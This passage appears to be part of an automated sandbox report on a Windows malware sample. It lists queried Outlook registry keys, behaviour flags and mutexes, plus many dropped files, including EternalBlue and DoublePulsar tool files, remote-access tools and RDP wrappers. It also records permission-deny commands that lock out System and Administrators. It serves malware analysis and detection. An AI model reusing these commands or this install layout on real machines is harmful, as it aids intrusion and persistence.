  2100. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  2101.  
  2102.  
  2103. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  2104.  
  2105.  
  2106. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  2107.  
  2108.  
  2109. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  2110.  
  2111.  
  2112. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  2113.  
  2114.  
  2115. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  2116.  
  2117.  
  2118. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  2119.  
  2120.  
  2121. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  2122.  
  2123.  
  2124. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  2125.  
  2126.  
  2127. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  2128.  
  2129.  
  2130. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  2131.  
  2132.  
  2133. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  2134.  
  2135.  
  2136. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  2137.  
  2138.  
  2139. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  2140.  
  2141.  
  2142. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  2143.  
  2144.  
  2145.  
  2146.  
  2147. "Description": "Attempts to modify UAC prompt behavior",
  2148. "Details":
  2149.  
  2150.  
  2151. "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
  2152. "Details":
  2153.  
  2154. "file": "C:\\Windows\\inf\\lsmm.exe \\deny \\xd0\\x90\\xd0\\xb4\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x81\\xd1\\x82\\xd1\\x80\\xd0\\xb0\\xd1\\x82\\xd0\\xbe\\xd1\\x80\\xd1\\x8b:(OI)(CI)(F)"
  2155.  
  2156.  
  2157. "file": "C:\\Windows\\inf\\lsmm.exe \\deny system:(OI)(CI)(F)"
  2158.  
  2159.  
  2160. "file": "C:\\Windows\\inf\\lsmm.exe \\deny Administrators:(OI)(CI)(F)"
  2161.  
  2162.  
  2163. "file": "C:\\Windows\\inf\\msief.exe \\deny \\xd0\\x90\\xd0\\xb4\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x81\\xd1\\x82\\xd1\\x80\\xd0\\xb0\\xd1\\x82\\xd0\\xbe\\xd1\\x80\\xd1\\x8b:(OI)(CI)(F)"
  2164.  
  2165.  
  2166.  
  2167.  
  2168. "Description": "Collects information to fingerprint the system",
  2169. "Details":
  2170.  
  2171.  
  2172. "Description": "Attempts to modify Explorer settings to prevent hidden files from being displayed",
  2173. "Details":
  2174.  
  2175.  
  2176.  
  2177. * Started Service:
  2178. "VaultSvc",
  2179. "AppIDSvc",
  2180. "AppMgmt",
  2181. "PolicyAgent",
  2182. "Browser",
  2183. "Winmgmt",
  2184. "RManService"
  2185.  
  2186.  
  2187. * Mutexes:
  2188. "DefaultTabtip-MainUI",
  2189. "CicLoadWinStaWinSta0",
  2190. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  2191. "Local\\ZoneAttributeCacheCounterMutex",
  2192. "Local\\ZonesCacheCounterMutex",
  2193. "Local\\ZonesLockedCacheCounterMutex",
  2194. "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726",
  2195. "CID Checker v0.1 ID CID Checker v0.1",
  2196. "MutexNPA_UnitVersioning_2716",
  2197. "MutexNPA_UnitVersioning_2008",
  2198. "MutexNPA_UnitVersioning_3236",
  2199. "MutexNPA_UnitVersioning_3784",
  2200. "DBWinMutex",
  2201. "MutexNPA_UnitVersioning_2896",
  2202. "Local\\RManFUSLocal",
  2203. "MutexNPA_UnitVersioning_4788",
  2204. "Local\\RManFUSTray",
  2205. "MutexNPA_UnitVersioning_2324",
  2206. "PolicyMutex",
  2207. "Global\\ADAP_WMI_ENTRY",
  2208. "Global\\RefreshRA_Mutex",
  2209. "Global\\RefreshRA_Mutex_Lib",
  2210. "Global\\RefreshRA_Mutex_Flag",
  2211. "CertStore"
  2212.  
  2213.  
  2214. * Modified Files:
  2215. "C:\\Programdata\\Microsoft\\Check\\Check.txt",
  2216. "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E09.tmp",
  2217. "C:\\Programdata\\Microsoft\\temp\\Clean.bat",
  2218. "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E29.tmp",
  2219. "C:\\Programdata\\Microsoft\\temp\\H.bat",
  2220. "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E4A.tmp",
  2221. "C:\\Programdata\\Microsoft\\temp\\Temp.bat",
  2222. "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E6A.tmp",
  2223. "C:\\Programdata\\Microsoft\\temp\\5.xml",
  2224. "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E9A.tmp",
  2225. "C:\\ProgramData\\Microsoft\\Intel\\wini.exe",
  2226. "C:\\Users\\user\\AppData\\Local\\Temp\\aut2736.tmp",
  2227. "C:\\ProgramData\\install\\zeta.exe",
  2228. "C:\\Users\\user\\AppData\\Local\\Temp\\aut292B.tmp",
  2229. "C:\\programdata\\install\\cheat.exe",
  2230. "C:\\Users\\user\\AppData\\Local\\Temp\\aut2DB0.tmp",
  2231. "C:\\ProgramData\\WindowsTask\\MicrosoftHost.exe",
  2232. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4",
  2233. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4",
  2234. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220",
  2235. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220",
  2236. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_99D41F4D77B8F7BB12F6EE812A503A28",
  2237. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_99D41F4D77B8F7BB12F6EE812A503A28",
  2238. "C:\\ProgramData\\Windows\\__tmp_rar_sfx_access_check_15458578",
  2239. "C:\\ProgramData\\Windows\\install.bat",
  2240. "C:\\ProgramData\\Windows\\rfusclient.exe",
  2241. "C:\\ProgramData\\Windows\\rutserv.exe",
  2242. "C:\\ProgramData\\Windows\\winit.exe",
  2243. "C:\\ProgramData\\Windows\\vp8decoder.dll",
  2244. "C:\\ProgramData\\Windows\\vp8encoder.dll",
  2245. "C:\\ProgramData\\Windows\\reg1.reg",
  2246. "C:\\ProgramData\\Windows\\reg2.reg",
  2247. "C:\\ProgramData\\Windows\\install.vbs",
  2248. "C:\\Users\\user\\AppData\\Local\\Temp\\aut2869.tmp",
  2249. "C:\\ProgramData\\install\\taskhostw.exe",
  2250. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
  2251. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
  2252. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
  2253. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
  2254. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
  2255. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
  2256. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
  2257. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
  2258. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
  2259. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
  2260. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
  2261. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
  2262. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
  2263. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
  2264. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
  2265. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
  2266. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
  2267. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
  2268. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  2269. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
  2270. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
  2271. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
  2272. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
  2273. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
  2274. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
  2275. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
  2276. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
  2277. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
  2278. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
  2279. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
  2280. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
  2281. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
  2282. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
  2283. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
  2284. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
  2285. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
  2286. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
  2287. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
  2288. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
  2289. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
  2290. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
  2291. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
  2292. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
  2293. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
  2294. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
  2295. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
  2296. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
  2297. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
  2298. "C:\\Users\\user\\AppData\\Local\\Temp\\15487921738197713423118.tmp",
  2299. "C:\\Users\\user\\AppData\\Local\\Temp\\15546765132410011601836.tmp",
  2300. "C:\\Users\\user\\AppData\\Local\\Temp\\155474533927682481299984.tmp",
  2301. "C:\\Users\\user\\AppData\\Local\\Temp\\155485622088868922817457.tmp",
  2302. "C:\\ProgramData\\Microsoft\\temp\\Log.txt",
  2303. "\\Device\\Afd\\AsyncSelectHlp",
  2304. "C:\\Users\\user\\AppData\\Local\\Temp\\aut8241.tmp",
  2305. "C:\\Programdata\\install\\del.bat",
  2306. "C:\\ProgramData\\Microsoft\\Intel\\__tmp_rar_sfx_access_check_15462125",
  2307. "C:\\ProgramData\\Microsoft\\Intel\\R8.exe",
  2308. "C:\\ProgramData\\Microsoft\\Intel\\taskhost.exe",
  2309. "C:\\Users\\user\\AppData\\Local\\Temp\\aut3AF7.tmp",
  2310. "C:\\Programdata\\RealtekHD\\taskhostw.exe",
  2311. "C:\\Programdata\\lsass.exe",
  2312. "C:\\Programdata\\kz.exe",
  2313. "C:\\Programdata\\script.exe",
  2314. "C:\\Programdata\\lsass2.exe",
  2315. "C:\\Programdata\\olly.exe",
  2316. "C:\\Windows\\boy.exe",
  2317. "C:\\Windows\\svchost.exe",
  2318. "C:\\Users\\user\\AppData\\Local\\Temp\\aut6936.tmp",
  2319. "C:\\Programdata\\WindowsTask\\winlogon.exe",
  2320. "C:\\Programdata\\WindowsTask\\scaner.dat",
  2321. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Q8H2MS75\\scaner1.dat",
  2322. "C:\\Programdata\\WindowsTask\\scaner.exe",
  2323. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\8BGZLQBV\\BOT1.CRP",
  2324. "C:\\ProgramData\\WindowsTask\\audiodg.exe",
  2325. "C:\\rdp\\__tmp_rar_sfx_access_check_15465812",
  2326. "C:\\rdp\\pause.bat",
  2327. "C:\\rdp\\Rar.exe",
  2328. "C:\\rdp\\run.vbs",
  2329. "C:\\rdp\\db.rar",
  2330. "C:\\Windows\\sysnative\\LogFiles\\Scm\\0a1870fd-5d56-4033-b69f-e1bd5ff7d09a",
  2331. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  2332. "C:\\Windows\\sysnative\\LogFiles\\Scm\\18e94867-91ba-4791-a6f2-c9f987b18808",
  2333. "\\??\\nul",
  2334. "\\??\\AppID",
  2335. "\\Device\\Http\\Communication",
  2336. "\\??\\PIPE\\RMSFUSClient32-1",
  2337. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  2338. "\\??\\PIPE\\RManFUSServerNotify32",
  2339. "\\??\\PIPE\\RManFUSCallbackNotify32",
  2340. "\\??\\root#umbus#0000#65a9a6cf-64cd-480b-843e-32c86e1ba19f",
  2341. "\\??\\umb#umb#1&841921d&0&printerbusenumerator#65a9a6cf-64cd-480b-843e-32c86e1ba19f",
  2342. "\\??\\PIPE\\lsarpc",
  2343. "\\??\\PIPE\\srvsvc",
  2344. "\\??\\NONSPOOLED_nul",
  2345. "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows\\AppID\\PolicyConverter",
  2346. "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
  2347. "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck",
  2348. "\\Device\\LanmanDatagramReceiver",
  2349. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  2350. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
  2351. "\\??\\SrpDevice",
  2352. "C:\\ProgramData\\RunDLL\\__tmp_rar_sfx_access_check_15714687",
  2353. "C:\\ProgramData\\RunDLL\\scan.txt",
  2354. "C:\\ProgramData\\RunDLL\\Doublepulsar-1.3.1.Skeleton.xml",
  2355. "C:\\ProgramData\\RunDLL\\Doublepulsar-1.3.1.xml",
  2356. "C:\\ProgramData\\RunDLL\\Eternalblue-2.2.0.Skeleton.xml",
  2357. "C:\\ProgramData\\RunDLL\\Eternalblue-2.2.0.xml",
  2358. "C:\\ProgramData\\RunDLL\\Doublepulsar-1.3.1.exe",
  2359. "C:\\ProgramData\\RunDLL\\Eternalblue-2.2.0.exe",
  2360. "C:\\ProgramData\\RunDLL\\rundll.exe",
  2361. "C:\\ProgramData\\RunDLL\\start.exe",
  2362. "C:\\ProgramData\\RunDLL\\system.exe",
  2363. "C:\\ProgramData\\RunDLL\\2x64.dll",
  2364. "C:\\ProgramData\\RunDLL\\2x86.dll",
  2365. "C:\\ProgramData\\RunDLL\\adfw-2.dll",
  2366. "C:\\ProgramData\\RunDLL\\adfw.dll",
  2367. "C:\\ProgramData\\RunDLL\\api-ms-win-core-file-l1-2-0.dll",
  2368. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-core-file-l1-2-0.dll",
  2369. "C:\\ProgramData\\RunDLL\\api-ms-win-core-file-l2-1-0.dll",
  2370. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-core-file-l2-1-0.dll",
  2371. "C:\\ProgramData\\RunDLL\\api-ms-win-core-localization-l1-2-0.dll",
  2372. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-core-localization-l1-2-0.dll",
  2373. "C:\\ProgramData\\RunDLL\\api-ms-win-core-processthreads-l1-1-1.dll",
  2374. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-core-processthreads-l1-1-1.dll",
  2375. "C:\\ProgramData\\RunDLL\\api-ms-win-core-synch-l1-2-0.dll",
  2376. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-core-synch-l1-2-0.dll",
  2377. "C:\\ProgramData\\RunDLL\\api-ms-win-core-timezone-l1-1-0.dll",
  2378. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-core-timezone-l1-1-0.dll",
  2379. "C:\\ProgramData\\RunDLL\\api-ms-win-core-xstate-l2-1-0.dll",
  2380. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-core-xstate-l2-1-0.dll",
  2381. "C:\\ProgramData\\RunDLL\\api-ms-win-crt-conio-l1-1-0.dll",
  2382. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-conio-l1-1-0.dll",
  2383. "C:\\ProgramData\\RunDLL\\api-ms-win-crt-convert-l1-1-0.dll",
  2384. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-convert-l1-1-0.dll",
  2385. "C:\\ProgramData\\RunDLL\\api-ms-win-crt-environment-l1-1-0.dll",
  2386. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-environment-l1-1-0.dll",
  2387. "C:\\ProgramData\\RunDLL\\api-ms-win-crt-filesystem-l1-1-0.dll",
  2388. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-filesystem-l1-1-0.dll",
  2389. "C:\\ProgramData\\RunDLL\\api-ms-win-crt-heap-l1-1-0.dll",
  2390. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-heap-l1-1-0.dll",
  2391. "C:\\ProgramData\\RunDLL\\api-ms-win-crt-locale-l1-1-0.dll",
  2392. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-locale-l1-1-0.dll",
  2393. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-math-l1-1-0.dll",
  2394. "C:\\ProgramData\\RunDLL\\api-ms-win-crt-math-l1-1-0.dll",
  2395. "C:\\ProgramData\\RunDLL\\api-ms-win-crt-multibyte-l1-1-0.dll",
  2396. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-multibyte-l1-1-0.dll",
  2397. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-private-l1-1-0.dll",
  2398. "C:\\ProgramData\\RunDLL\\api-ms-win-crt-private-l1-1-0.dll",
  2399. "C:\\ProgramData\\RunDLL\\api-ms-win-crt-process-l1-1-0.dll",
  2400. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-process-l1-1-0.dll",
  2401. "C:\\ProgramData\\RunDLL\\api-ms-win-crt-runtime-l1-1-0.dll",
  2402. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-runtime-l1-1-0.dll",
  2403. "C:\\ProgramData\\RunDLL\\api-ms-win-crt-stdio-l1-1-0.dll",
  2404. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-stdio-l1-1-0.dll",
  2405. "C:\\ProgramData\\RunDLL\\api-ms-win-crt-string-l1-1-0.dll",
  2406. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-string-l1-1-0.dll",
  2407. "C:\\ProgramData\\RunDLL\\api-ms-win-crt-time-l1-1-0.dll",
  2408. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-time-l1-1-0.dll",
  2409. "C:\\ProgramData\\RunDLL\\api-ms-win-crt-utility-l1-1-0.dll",
  2410. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-utility-l1-1-0.dll",
  2411. "C:\\ProgramData\\RunDLL\\api-ms-win-eventing-provider-l1-1-0.dll",
  2412. "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-eventing-provider-l1-1-0.dll",
  2413. "C:\\ProgramData\\RunDLL\\cnli-0.dll",
  2414. "C:\\ProgramData\\RunDLL\\cnli-1.dll",
  2415. "C:\\ProgramData\\RunDLL\\coli-0.dll",
  2416. "C:\\ProgramData\\RunDLL\\concrt140.dll",
  2417. "C:\\ProgramData\\RunDLL\\crli-0.dll",
  2418. "C:\\ProgramData\\RunDLL\\dmgd-1.dll",
  2419. "C:\\ProgramData\\RunDLL\\dmgd-4.dll",
  2420. "C:\\ProgramData\\RunDLL\\esco-0.dll",
  2421. "C:\\ProgramData\\RunDLL\\etch-0.dll",
  2422. "C:\\ProgramData\\RunDLL\\etchCore-0.x64.dll",
  2423. "C:\\ProgramData\\RunDLL\\etchCore-0.x86.dll",
  2424. "C:\\ProgramData\\RunDLL\\eteb-2.dll",
  2425. "C:\\ProgramData\\RunDLL\\etebCore-2.x64.dll",
  2426. "C:\\ProgramData\\RunDLL\\etebCore-2.x86.dll",
  2427. "C:\\ProgramData\\RunDLL\\exma-1.dll",
  2428. "C:\\ProgramData\\RunDLL\\exma.dll",
  2429. "C:\\ProgramData\\RunDLL\\iconv.dll",
  2430. "C:\\ProgramData\\RunDLL\\libcurl.dll",
  2431. "C:\\ProgramData\\RunDLL\\libeay32.dll",
  2432. "C:\\ProgramData\\RunDLL\\libiconv-2.dll",
  2433. "C:\\ProgramData\\RunDLL\\libxml2.dll",
  2434. "C:\\ProgramData\\RunDLL\\mfc140chs.dll",
  2435. "C:\\ProgramData\\RunDLL\\mfc140cht.dll",
  2436. "C:\\ProgramData\\RunDLL\\mfc140deu.dll",
  2437. "C:\\ProgramData\\RunDLL\\mfc140enu.dll",
  2438. "C:\\ProgramData\\RunDLL\\mfc140esn.dll",
  2439. "C:\\ProgramData\\RunDLL\\mfc140fra.dll",
  2440. "C:\\ProgramData\\RunDLL\\mfc140ita.dll",
  2441. "C:\\ProgramData\\RunDLL\\mfc140jpn.dll",
  2442. "C:\\ProgramData\\RunDLL\\mfc140kor.dll",
  2443. "C:\\ProgramData\\RunDLL\\mfc140rus.dll",
  2444. "C:\\ProgramData\\RunDLL\\mfcm140.dll",
  2445. "C:\\ProgramData\\RunDLL\\mfcm140u.dll",
  2446. "C:\\ProgramData\\RunDLL\\msvcp140.dll",
  2447. "C:\\ProgramData\\RunDLL\\pcla-0.dll",
  2448. "C:\\ProgramData\\RunDLL\\pcre-0.dll",
  2449. "C:\\ProgramData\\RunDLL\\pcrecpp-0.dll",
  2450. "C:\\ProgramData\\RunDLL\\pcreposix-0.dll",
  2451. "C:\\ProgramData\\RunDLL\\posh-0.dll",
  2452. "C:\\ProgramData\\RunDLL\\posh.dll",
  2453. "C:\\ProgramData\\RunDLL\\riar-2.dll",
  2454. "C:\\ProgramData\\RunDLL\\riar.dll",
  2455. "C:\\ProgramData\\RunDLL\\ssleay32.dll",
  2456. "C:\\ProgramData\\RunDLL\\tibe-1.dll",
  2457. "C:\\ProgramData\\RunDLL\\tibe-2.dll",
  2458. "C:\\ProgramData\\RunDLL\\tibe.dll",
  2459. "C:\\ProgramData\\RunDLL\\trch-0.dll",
  2460. "C:\\ProgramData\\RunDLL\\trch-1.dll",
  2461. "C:\\ProgramData\\RunDLL\\trch.dll",
  2462. "C:\\ProgramData\\RunDLL\\trfo-0.dll",
  2463. "C:\\ProgramData\\RunDLL\\trfo-2.dll",
  2464. "C:\\ProgramData\\RunDLL\\trfo.dll",
  2465. "C:\\ProgramData\\RunDLL\\tucl-1.dll",
  2466. "C:\\ProgramData\\RunDLL\\tucl.dll",
  2467. "C:\\ProgramData\\RunDLL\\ucl.dll",
  2468. "C:\\ProgramData\\RunDLL\\ucrtbase.dll",
  2469. "C:\\ProgramData\\RunDLL\\vcamp140.dll",
  2470. "C:\\ProgramData\\RunDLL\\vccorlib140.dll",
  2471. "C:\\ProgramData\\RunDLL\\vcomp140.dll",
  2472. "C:\\ProgramData\\RunDLL\\vcruntime140.dll",
  2473. "C:\\ProgramData\\RunDLL\\x64.dll",
  2474. "C:\\ProgramData\\RunDLL\\x86.dll",
  2475. "C:\\ProgramData\\RunDLL\\xdvl-0.dll",
  2476. "C:\\ProgramData\\RunDLL\\zibe.dll",
  2477. "C:\\ProgramData\\RunDLL\\zlib1.dll",
  2478. "C:\\ProgramData\\RunDLL\\Eternalblue-2.2.0.fb",
  2479. "C:\\ProgramData\\RunDLL\\start.vbs",
  2480. "C:\\rdp\\..txt",
  2481. "C:\\rdp\\bat.bat",
  2482. "C:\\rdp\\RDPWInst.exe",
  2483. "C:\\rdp\\install.vbs"
  2484.  
  2485.  
  2486. * Deleted Files:
  2487. "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E09.tmp",
  2488. "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E29.tmp",
  2489. "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E4A.tmp",
  2490. "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E6A.tmp",
  2491. "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E9A.tmp",
  2492. "C:\\Users\\user\\AppData\\Local\\Temp\\aut2736.tmp",
  2493. "C:\\Users\\user\\AppData\\Local\\Temp\\aut292B.tmp",
  2494. "C:\\Users\\user\\AppData\\Local\\Temp\\aut2DB0.tmp",
  2495. "C:\\Programdata\\Windows\\winit.exe",
  2496. "C:\\ProgramData\\Windows\\__tmp_rar_sfx_access_check_15458578",
  2497. "C:\\Users\\user\\AppData\\Local\\Temp\\aut2869.tmp",
  2498. "C:\\Users\\user\\AppData\\Local\\Temp\\15487921738197713423118.tmp",
  2499. "C:\\Users\\user\\AppData\\Local\\Temp\\15546765132410011601836.tmp",
  2500. "C:\\Users\\user\\AppData\\Local\\Temp\\155474533927682481299984.tmp",
  2501. "C:\\Users\\user\\AppData\\Local\\Temp\\155485622088868922817457.tmp",
